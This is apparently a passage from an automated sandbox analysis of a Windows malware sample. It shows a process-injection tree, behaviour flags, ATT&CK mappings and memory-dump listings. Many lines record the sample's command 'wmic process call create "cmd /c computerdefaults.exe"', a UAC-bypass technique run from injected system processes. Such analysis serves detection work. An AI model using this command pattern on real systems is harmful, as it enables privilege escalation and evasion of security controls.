    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2352

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:2792
- C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
  "C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:652
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2196
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:4108
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3708
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:900
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2952
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:4156
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1612
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:4144
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3804
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1352
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3988
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:956

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:3424
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2128
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2340
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3004
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2972

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3696
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3696 -s 820
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1744

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2452
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4040
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3228
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2408
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1976

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4292
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4508

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4280
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4476

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4272
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4556

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4300
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4524

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4444
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4648

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4544
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4724

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4616
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4744

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4764
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5028

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4756
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5040

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4872
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4788

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4904
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4152

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4976
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2980

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5060
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1964

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5088
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:2288
- - C:\Windows\System32\ie4uinit.exe
    "C:\Windows\System32\ie4uinit.exe" -reinstall
    3⤵
    - Modifies Internet Explorer settings
    - Modifies registry class
    PID:2180
- - C:\Windows\system32\unregmp2.exe
    C:\Windows\system32\unregmp2.exe /SetWMPAsDefault
    3⤵
    - Drops file in Windows directory
    - Modifies registry class
    PID:2220

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/652-123-0x000002062CD50000-0x000002062CD51000-memory.dmp

Filesize
4KB

Download
memory/652-126-0x000002062CD80000-0x000002062CD81000-memory.dmp

Filesize
4KB

Download
memory/652-120-0x000002062CD00000-0x000002062CD01000-memory.dmp

Filesize
4KB

Download
memory/652-119-0x000002062C6D0000-0x000002062C6D1000-memory.dmp

Filesize
4KB

Download
memory/652-121-0x000002062CD10000-0x000002062CD11000-memory.dmp

Filesize
4KB

Download
memory/652-122-0x000002062CD20000-0x000002062CD21000-memory.dmp

Filesize
4KB

Download
memory/652-116-0x000002062C6A0000-0x000002062C6A1000-memory.dmp

Filesize
4KB

Download
memory/652-124-0x000002062CD60000-0x000002062CD61000-memory.dmp

Filesize
4KB

Download
memory/652-125-0x000002062CD70000-0x000002062CD71000-memory.dmp

Filesize
4KB

Download
memory/652-118-0x000002062C6C0000-0x000002062C6C1000-memory.dmp

Filesize
4KB

Download
memory/652-159-0x000002062D3A0000-0x000002062D3A1000-memory.dmp

Filesize
4KB

Download
memory/652-117-0x000002062C6B0000-0x000002062C6B1000-memory.dmp

Filesize
4KB

Download
memory/652-115-0x000002062ACB0000-0x000002062ACB6000-memory.dmp

Filesize
24KB

Download
memory/2316-127-0x0000028CDE770000-0x0000028CDE774000-memory.dmp

Filesize
16KB

Download